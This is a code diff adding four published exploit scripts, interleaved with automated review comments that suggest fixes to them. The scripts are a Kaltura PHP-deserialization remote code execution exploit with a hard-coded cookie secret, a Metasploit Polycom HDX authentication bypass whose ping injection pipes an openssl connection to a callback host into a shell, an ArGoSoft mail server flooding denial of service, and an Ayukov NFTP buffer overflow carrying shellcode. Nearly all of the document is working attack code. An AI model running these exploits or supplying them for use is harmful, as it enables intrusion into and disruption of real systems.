@@ -0,0 +1,59 @@ +#!/usr/bin/env python + +# Kaltura <= 13.1.0 RCE (CVE-2017-14143) +# https://telekomsecurity.github.io/2017/09/kaltura-rce.html +# +# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')" +# [~] host: https://example.com +# [~] entry_id: 0_xxxxxxxx +# [~] code: system('id') +# [+] sending request.. +# uid=1003(wwwrun) gid=50004(www) groups=50004(www),7373(kaltura) + +import urllib +import urllib2 +import base64 +import md5 +import sys + +cookie_secret = 'y3tAno3therS$cr3T'; + +def exploit(host, entry_id, php_code): + print("[+] Sending request..") + url = "{}/index.php/keditorservices/getAllEntries?list_type=15&entry_id={}".format(host, entry_id) + + cmd = "{}.die();".format(php_code) + cmd_len = len(cmd) + + payload = "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:%s:\"%s\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}" + + exploit_code = payload % (len(cmd), cmd) + encoded = base64.b64encode(exploit_code) + md5_hash = md5.new("%s%s" % (encoded, cookie_secret)).hexdigest() + + cookies={'userzone': "%s%s" % (encoded, md5_hash)} + + r = urllib2.Request(url) + r.add_header('Cookie', urllib.urlencode(cookies)) + + req = urllib2.urlopen(r) + return req.read() + +if __name__ == '__main__': + + if len(sys.argv) < 4: + print("Usage: %s " % sys.argv[0]) + print(" example: %s http://example.com 0_abc1234 system('id')" % sys.argv[0]) + sys.exit(0) + + host = sys.argv[1] + entry_id = sys.argv[2] + cmd = sys.argv[3] + + print("[~] host: %s" % host) + print("[~] entry_id: %s" % entry_id) + print("[~] php_code: %s" % cmd) + 
+ result = exploit(sys.argv[1], sys.argv[2], sys.argv[3]) + + print(result) \ No newline at end of file diff --git a/platforms/unix/remote/43032.rb b/platforms/unix/remote/43032.rb new file mode 100755 index 000000000..168aa77ed --- /dev/null +++ b/platforms/unix/remote/43032.rb 
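Review bot: platforms/php/webapps/43028.py imports the md5 module, which was deprecated in Python 2.5 and does not exist in Python 3, under a bare `python` shebang; `hashlib.md5(...)` yields the same digest on both, and the shebang should say python2 while urllib2 is still used. The usage message has lost its argument placeholders (`"Usage: %s " % sys.argv[0]` prints nothing after the script name) even though the example line still shows the three expected arguments. The header says "Kaltura <= 13.1.0" while the files.csv row for 43028 in this commit says "Kaltura < 13.1.0"; the two should agree. Minor: stray trailing semicolon on cookie_secret, and the header example prints "[~] code:" where the script prints "[~] php_code:".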
@@ -0,0 +1,246 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Polycom Command Shell Authorization Bypass', + 'Alias' => 'polycom_hdx_auth_bypass', + 'Author' => + [ + 'Paul Haas ', # module + 'h00die ', # submission/cleanup + ], + 'DisclosureDate' => 'Jan 18 2013', + 'Description' => %q( + The login component of the Polycom Command Shell on Polycom HDX + video endpoints, running software versions 3.0.5 and earlier, + is vulnerable to an authorization bypass when simultaneous + connections are made to the service, allowing remote network + attackers to gain access to a sandboxed telnet prompt without + authentication. Versions prior to 3.0.4 contain OS command + injection in the ping command which can be used to execute + arbitrary commands as root. 
+ ), + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ], + [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ], + [ 'EDB', '24494'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => { 'PayloadType' => 'cmd' } + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' }, + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(23), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) + ], self.class + ) + register_advanced_options( + [ + OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]), + OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100]) + ], self.class + ) + end + + def check + connect + sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n") + Rex.sleep(1) + res = sock.get_once + disconnect + + if !res && !res.empty? + return Exploit::CheckCode::Safe + end + + if res =~ /Welcome to ViewStation/ + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + # Keep track of results (successful connections) + results = [] + + # Random string for password + password = Rex::Text.rand_text_alpha(rand(5) + 1) + + # Threaded login checker + max_threads = datastore['THREADS'] + cur_threads = [] + + # Try up to 100 times just to be sure + queue = [*(1..datastore['MAX_CONNECTIONS'])] + + print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ") + until queue.empty? 
+ while cur_threads.length < max_threads + + # We can stop if we get a valid login + break unless results.empty? + + # keep track of how many attempts we've made + item = queue.shift + + # We can stop if we reach max tries + break unless item + + t = Thread.new(item) do |count| + sock = connect + sock.put(password + "\n") + res = sock.get_once + + until res.empty? + break unless results.empty? + + # Post-login Polycom banner means success + if res =~ /Polycom/ + results << sock + break + # bind error indicates bypass is working + elsif res =~ /bind/ + sock.put(password + "\n") + # Login error means we need to disconnect + elsif res =~ /failed/ + break + # To many connections means we need to disconnect + elsif res =~ /Error/ + break + end + res = sock.get_once + end + end + + cur_threads << t + end + + # We can stop if we get a valid login + break unless results.empty? + + # Add to a list of dead threads if we're finished + cur_threads.each_index do |ti| + t = cur_threads[ti] + unless t.alive? + cur_threads[ti] = nil + end + end + + # Remove any dead threads from the set + cur_threads.delete(nil) + + Rex.sleep(0.25) + end + + # Clean up any remaining threads + cur_threads.each { |sock| sock.kill } + + if !results.empty? 
+ print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw") + do_payload(results[0]) + else + print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") + end + end + + def do_payload(sock) + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128 + cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n" + sock.put(cmd) + + # Give time for our command to be queued and executed + 1.upto(5) do + Rex.sleep(1) + break if session_created? + end + end + + def stage_final_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == 'local' + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self + } + ) + + self.service.on_client_connect_proc = proc { |client| + stage_final_payload(client) + } + + # Start the listening service + self.service.start + end + + # Shut down any running services + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.is_a?(Rex::Service) + if self.service.is_a?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + # Accessor for our TCP 
payload stager + attr_accessor :service +end \ No newline at end of file diff --git a/platforms/windows/dos/43026.py b/platforms/windows/dos/43026.py new file mode 100755 index 000000000..8be499370 --- /dev/null +++ b/platforms/windows/dos/43026.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python +# coding: utf-8 + +############ Description: ########## +# The vulnerability was discovered during a vulnerability research lecture. +# +# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2 +# and earlier allows remote attackers to waste CPU resources (memory +# consumption) via unspecified vectors. +#################################### + +# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption) +# Date: 2017-10-21 +# Exploit Author: Berk Cem Göksel +# Contact: twitter.com/berkcgoksel || bgoksel.com +# Vendor Homepage: http://www.argosoft.com +# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx +# Version: 1.0.0.2 +# Tested on: Windows 10 +# Category: Windows Remote Denial-of-Service +# CVE : CVE-2017-15223 + + +import socket +from threading import Thread + +def data(): + + ip = '127.0.0.1' + port = 25 + counter = 50 + string = '&' + + while True: + try: + if counter >= 10000: + counter = 0 + else: + + counter = counter + 50 + A = (string * counter) + 'user2@othermail.com' + print "String lenght: " + str(len(A)) + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5.0) + sock.connect((ip, port)) + sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n') + sock.recv(1024) + sock.close() + + except Exception as e: + continue + +def main(): + iterations = int(input("Threads: ")) + for i in range(iterations): + t = Thread(target=data) + t.start() + +if __name__ == '__main__': + main() + 
diff --git a/platforms/windows/remote/43025.py b/platforms/windows/remote/43025.py new file mode 100755 index 000000000..4c6a8b881 --- /dev/null +++ b/platforms/windows/remote/43025.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/env python +# coding: utf-8 + +############ Description: ########## +# The vulnerability was discovered during a vulnerability research lecture. +# This is meant to be a PoC. +#################################### + +# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow +# Date: 2017-10-21 +# Exploit Author: Berk Cem Göksel +# Contact: twitter.com/berkcgoksel || bgoksel.com +# Vendor Homepage: http://ayukov.com/nftp/source-release.html +# Software Link: ftp://ftp.ayukov.com/pub/nftp/ +# Version: v1.71, v1.72, v1.8, v2.0 +# Tested on: Windows 10 +# Category: Windows Remote Exploit +# CVE : CVE-2017-15222 + +import socket + +IP = '127.0.0.1' +port = 21 + + +#(exec calc.exe) +shellcode=( +"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1" +"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5" +"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b" +"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd" +"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb" +"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08" +"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64" +"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33" +"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5" +"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b" +"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98" +"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43" +"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53" +"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f" +"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea" +"\x51\x58") + +CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe #0040FCDD +buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode)) +#Can call esp but the null byte terminates the string. 
+ +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((IP, port)) + s.listen(20) + print("[i] FTP Server started on port: "+str(port)+"\r\n") +except: + print("[!] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome!' + '\r\n') + print conn.recv(1024) + conn.send('331 OK.\r\n') + print conn.recv(1024) + conn.send('230 OK.\r\n') + print conn.recv(1024) + conn.send(buff + '\r\n') + print conn.recv(1024) + conn.send('257' + '\r\n') + +
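Review bot: In the Polycom module's `check` method, the guard `if !res && !res.empty?` is wrong in both branches: when `sock.get_once` returns `nil`, `!res.empty?` raises `NoMethodError` on `nil`, and when `res` is a String the first operand is always false, so the intended "no banner received" case is never caught. It should read `if !res || res.empty?` (or `if res.nil? || res.empty?`) so that `check` returns `Exploit::CheckCode::Safe` on a silent target instead of crashing. Two smaller points in the same hunk: the `MAX_CONNECTIONS` advanced option reuses the `THREADS` description text `'Threads for authentication bypass'` and should describe the connection cap instead, and the comment `# To many connections means we need to disconnect` should read "Too many"; the cleanup loop `cur_threads.each { |sock| sock.kill }` iterates over threads, so the block variable would be clearer as `t` or `thread`.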
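Review bot: 43026.py mixes Python 2 and Python 3 idioms: `print "String lenght: " + ...` is the Python 2 print statement, while `int(input("Threads: "))` relies on Python 3 semantics (under Python 2, `input()` evaluates the typed expression). Pick one interpreter in the shebang and use it consistently (`print("String length: " + ...)` with `input()` for Python 3), and fix the spelling of "length". The header also contradicts itself, describing the impact as "waste CPU resources (memory consumption)"; state either CPU or memory, matching the title's "Memory Consumption". Finally, the `except Exception as e: continue` inside the `while True` loop silently swallows every connection error forever, so a wrong host or port gives no feedback at all; at minimum log `e` before continuing.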
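Review bot: In 43025.py the bare `except:` around `s.bind(...)`/`s.listen(20)` prints the failure message but then falls through to the `while True: conn, addr = s.accept()` loop, so a port that is already in use produces an unhandled exception on `accept()` (or a `NameError` if `socket.socket()` itself failed, since `s` is never assigned). The `except` block should `sys.exit(1)` (with `import sys`) after printing, and catching `socket.error` rather than everything would keep real bugs visible. The file also mixes `print("...")` calls with Python 2 `print conn.recv(1024)` statements; the Python 2 form is the only one that works as written, so either commit to Python 2 or convert the statements to `print(conn.recv(1024))`.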